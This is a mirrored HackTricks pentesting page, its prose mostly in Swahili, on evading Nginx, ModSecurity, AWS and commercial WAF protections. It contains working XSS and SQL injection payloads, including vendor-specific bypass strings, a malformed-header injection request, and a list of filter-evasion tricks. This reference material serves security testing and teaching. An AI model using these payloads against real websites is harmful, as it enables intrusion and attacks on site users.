maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/proxy-waf-protections-bypass.md

215 lines
14 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Proxy / WAF Protections Bypass
{{#include ../banners/hacktricks-training.md}}
## Bypass Nginx ACL Rules with Pathname Manipulation <a href="#heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules" id="heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules"></a>
Mbinu [kutoka utafiti huu](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies).
Mfano wa sheria za Nginx:
```plaintext
location = /admin {
deny all;
}
location = /admin/ {
deny all;
}
```
Ili kuzuia kupita, Nginx inafanya urekebishaji wa njia kabla ya kuangalia. Hata hivyo, ikiwa seva ya nyuma inafanya urekebishaji tofauti (kuondoa wahusika ambao nginx haondoi) inaweza kuwa inawezekana kupita ulinzi huu.
### **NodeJS - Express**
| Nginx Version | **Node.js Bypass Characters** |
| ------------- | ----------------------------- |
| 1.22.0 | `\xA0` |
| 1.21.6 | `\xA0` |
| 1.20.2 | `\xA0`, `\x09`, `\x0C` |
| 1.18.0 | `\xA0`, `\x09`, `\x0C` |
| 1.16.1 | `\xA0`, `\x09`, `\x0C` |
### **Flask**
| Nginx Version | **Flask Bypass Characters** |
| ------------- | -------------------------------------------------------------- |
| 1.22.0 | `\x85`, `\xA0` |
| 1.21.6 | `\x85`, `\xA0` |
| 1.20.2 | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
| 1.18.0 | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
| 1.16.1 | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
### **Spring Boot**
| Nginx Version | **Spring Boot Bypass Characters** |
| ------------- | --------------------------------- |
| 1.22.0 | `;` |
| 1.21.6 | `;` |
| 1.20.2 | `\x09`, `;` |
| 1.18.0 | `\x09`, `;` |
| 1.16.1 | `\x09`, `;` |
### **PHP-FPM**
Nginx FPM configuration:
```plaintext
location = /admin.php {
deny all;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}
```
Nginx imewekwa kuzuia ufikiaji wa `/admin.php` lakini inawezekana kupita hii kwa kufikia `/admin.php/index.php`.
### Jinsi ya kuzuia
```plaintext
location ~* ^/admin {
deny all;
}
```
## Bypass Mod Security Rules <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
### Path Confusion
[**Katika chapisho hili**](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) inaelezwa kwamba ModSecurity v3 (hadi 3.0.12), **ilitekelezwa vibaya `REQUEST_FILENAME`** variable ambayo ilipaswa kuwa na njia iliyofikiwa (hadi mwanzo wa vigezo). Hii ni kwa sababu ilifanya URL decode ili kupata njia.\
Hivyo, ombi kama `http://example.com/foo%3f';alert(1);foo=` katika mod security litadhani kwamba njia ni tu `/foo` kwa sababu `%3f` inabadilishwa kuwa `?` ikimaliza njia ya URL, lakini kwa kweli njia ambayo seva itapokea itakuwa `/foo%3f';alert(1);foo=`.
Vigezo `REQUEST_BASENAME` na `PATH_INFO` pia vilikumbwa na hitilafu hii.
Kitu kama hicho kilitokea katika toleo la 2 la Mod Security ambayo iliruhusu kupita ulinzi ambao ulizuia mtumiaji kufikia faili zenye extensions maalum zinazohusiana na faili za akiba (kama `.bak`) kwa kutuma tu dot URL encoded katika `%2e`, kwa mfano: `https://example.com/backup%2ebak`.
## Bypass AWS WAF ACL <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
### Malformed Header
[Utafiti huu](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) unataja kwamba ilikuwa inawezekana kupita sheria za AWS WAF zilizotumika juu ya vichwa vya HTTP kwa kutuma kichwa "kilichovunjika" ambacho hakikupaswa kuchambuliwa vizuri na AWS lakini kilichambuliwa na seva ya nyuma.
Kwa mfano, kutuma ombi lifuatalo lenye SQL injection katika kichwa cha X-Query:
```http
GET / HTTP/1.1\r\n
Host: target.com\r\n
X-Query: Value\r\n
\t' or '1'='1' -- \r\n
Connection: close\r\n
\r\n
```
Iliwezekana kupita AWS WAF kwa sababu haingelewa kwamba mstari unaofuata ni sehemu ya thamani ya kichwa wakati seva ya NODEJS ilifanya hivyo (hii ilirekebishwa).
## Kupita WAF za Kijenerali
### Mipaka ya Ukubwa wa Ombi
Kwa kawaida WAF zina mipaka fulani ya urefu wa maombi ya kuangalia na ikiwa ombi la POST/PUT/PATCH likipita, WAF haitakagua ombi hilo.
- Kwa AWS WAF, unaweza [**kuangalia nyaraka**](https://docs.aws.amazon.com/waf/latest/developerguide/limits.html)**:**
<table data-header-hidden><thead><tr><th width="687"></th><th></th></tr></thead><tbody><tr><td>Ukubwa wa juu wa mwili wa ombi la wavuti ambalo linaweza kukaguliwa kwa ulinzi wa Application Load Balancer na AWS AppSync</td><td>8 KB</td></tr><tr><td>Ukubwa wa juu wa mwili wa ombi la wavuti ambalo linaweza kukaguliwa kwa ulinzi wa CloudFront, API Gateway, Amazon Cognito, App Runner, na Verified Access**</td><td>64 KB</td></tr></tbody></table>
- Kutoka [**nyaraka za Azure**](https://learn.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-waf-request-size-limits)**:**
Firewalls za zamani za Maombi ya Wavuti zenye Core Rule Set 3.1 (au chini) zinaruhusu ujumbe wenye ukubwa zaidi ya **128 KB** kwa kuzima ukaguzi wa mwili wa ombi, lakini ujumbe hizi hazitakaguliwa kwa udhaifu. Kwa matoleo mapya (Core Rule Set 3.2 au mpya), jambo sawa linaweza kufanywa kwa kuzima mipaka ya juu ya mwili wa ombi. Wakati ombi linapopita mipaka ya ukubwa:
Ikiwa **mode ya kuzuia**: Inarekodi na kuzuia ombi.\
Ikiwa **mode ya kugundua**: Inakagua hadi mipaka, inapuuzilia mbali yaliyobaki, na inarekodi ikiwa `Content-Length` inazidi mipaka.
- Kutoka [**Akamai**](https://community.akamai.com/customers/s/article/Can-WAF-inspect-all-arguments-and-values-in-request-body?language=en_US)**:**
Kwa kawaida, WAF inakagua tu 8KB za kwanza za ombi. Inaweza kuongeza mipaka hadi 128KB kwa kuongeza Metadata ya Juu.
- Kutoka [**Cloudflare**](https://developers.cloudflare.com/ruleset-engine/rules-language/fields/#http-request-body-fields)**:**
Hadi 128KB.
### Obfuscation <a href="#obfuscation" id="obfuscation"></a>
```bash
# IIS, ASP Clasic
<%s%cr%u0131pt> == <script>
# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;
```
### Unicode Compatability <a href="#unicode-compatability" id="unicode-compatability"></a>
Kulingana na utekelezaji wa normalization ya Unicode (maelezo zaidi [hapa](https://jlajara.gitlab.io/Bypass_WAF_Unicode)), wahusika wanaoshiriki ufanisi wa Unicode wanaweza kuweza kupita WAF na kutekelezwa kama mzigo ulio kusudiwa. Wahusika wanaofaa wanaweza kupatikana [hapa](https://www.compart.com/en/unicode).
#### Example <a href="#example" id="example"></a>
```bash
# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
img src⁼p onerror⁼prompt⁽1⁾﹥ --> img src=p onerror='prompt(1)'>
```
### Bypass Contextual WAFs with encodings <a href="#ip-rotation" id="ip-rotation"></a>
Kama ilivyotajwa katika [**hiki kipande cha blog**](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization), ili kupita WAFs zinazoweza kudumisha muktadha wa ingizo la mtumiaji tunaweza kutumia mbinu za WAF ili kweli kuleta hali ya kawaida ya ingizo la watumiaji.
Kwa mfano, katika chapisho hilo inatajwa kwamba **Akamai ilichambua ingizo la mtumiaji mara 10**. Hivyo basi kitu kama `<input/%2525252525252525253e/onfocus` kitaonekana na Akamai kama `<input/>/onfocus` ambacho **kinaweza kufikiriwa kuwa sawa kwani lebo imefungwa**. Hata hivyo, mradi tu programu hiyo haifanyi URL decode ingizo mara 10, mwathirika ataona kitu kama `<input/%25252525252525253e/onfocus` ambacho **bado ni halali kwa shambulio la XSS**.
Hivyo basi, hii inaruhusu **kuficha payloads katika sehemu zilizohifadhiwa** ambazo WAF itachambua na kutafsiri wakati mwathirika hatatambua.
Zaidi ya hayo, hii inaweza kufanywa si tu na payloads zilizohifadhiwa za URL bali pia na encoding nyingine kama unicode, hex, octal...
Katika chapisho hilo, bypasses za mwisho zifuatazo zinapendekezwa:
- Akamai:`akamai.com/?x=<x/%u003e/tabindex=1 autofocus/onfocus=x=self;x['ale'%2b'rt'](999)>`
- Imperva:`imperva.com/?x=<x/\x3e/tabindex=1 style=transition:0.1s autofocus/onfocus="a=document;b=a.defaultView;b.ontransitionend=b['aler'%2b't'];style.opacity=0;Object.prototype.toString=x=>999">`
- AWS/Cloudfront:`docs.aws.amazon.com/?x=<x/%26%23x3e;/tabindex=1 autofocus/onfocus=alert(999)>`
- Cloudflare:`cloudflare.com/?x=<x tabindex=1 autofocus/onfocus="style.transition='0.1s';style.opacity=0;self.ontransitionend=alert;Object.prototype.toString=x=>999">`
Pia inatajwa kwamba kulingana na **jinsi baadhi ya WAFs zinavyoelewa muktadha** wa ingizo la mtumiaji, inaweza kuwa inawezekana kutumia vibaya. Mfano ulioanzishwa katika blog ni kwamba Akamai iliruhusu kuweka chochote kati ya `/*` na `*/` (labda kwa sababu hii hutumiwa mara nyingi kama maoni). Hivyo basi, SQLinjection kama `/*'or sleep(5)-- -*/` haitakamatwa na itakuwa halali kwani `/*` ni mfuatano wa mwanzo wa injection na `*/` imewekwa kama maoni.
Aina hizi za matatizo ya muktadha zinaweza pia kutumika **kuitumia vibaya udhaifu mwingine zaidi ya ule unaotarajiwa** kutumiwa na WAF (kwa mfano, hii inaweza pia kutumika kutekeleza XSS).
### H2C Smuggling <a href="#ip-rotation" id="ip-rotation"></a>
{{#ref}}
h2c-smuggling.md
{{#endref}}
### IP Rotation <a href="#ip-rotation" id="ip-rotation"></a>
- [https://github.com/ustayready/fireprox](https://github.com/ustayready/fireprox): Tengeneza URL ya API gateway kutumika na ffuf
- [https://github.com/rootcathacking/catspin](https://github.com/rootcathacking/catspin): Kufanana na fireprox
- [https://github.com/PortSwigger/ip-rotate](https://github.com/PortSwigger/ip-rotate): Burp Suite plugin inayotumia IP za API gateway
- [https://github.com/fyoorer/ShadowClone](https://github.com/fyoorer/ShadowClone): Idadi inayopangwa kwa njia ya kidinari ya mifano ya kontena inazinduliwa kulingana na ukubwa wa faili ya ingizo na kipengele cha kugawanya, huku ingizo likigawanywa katika vipande kwa utekelezaji wa sambamba, kama mifano 100 ikipitia vipande 100 kutoka kwa faili ya ingizo yenye mistari 10,000 na kipengele cha kugawanya cha mistari 100.
- [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)
### Regex Bypasses
Mbinu tofauti zinaweza kutumika kupita vichujio vya regex kwenye moto. Mifano ni pamoja na kubadilisha kesi, kuongeza mapumziko ya mistari, na kuandika payloads. Rasilimali za bypass mbalimbali zinaweza kupatikana katika [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads) na [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html). Mifano iliyo hapa chini ilitolewa kutoka [hiki kipande](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2).
```bash
<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parenetheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
```
## Tools
- [**nowafpls**](https://github.com/assetnote/nowafpls): Burp plugin kuongeza data za kijinga kwenye maombi ili kupita WAFs kwa urefu
## References
- [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
- [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
- [https://www.youtube.com/watch?v=0OMmWtU2Y_g](https://www.youtube.com/watch?v=0OMmWtU2Y_g)
- [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink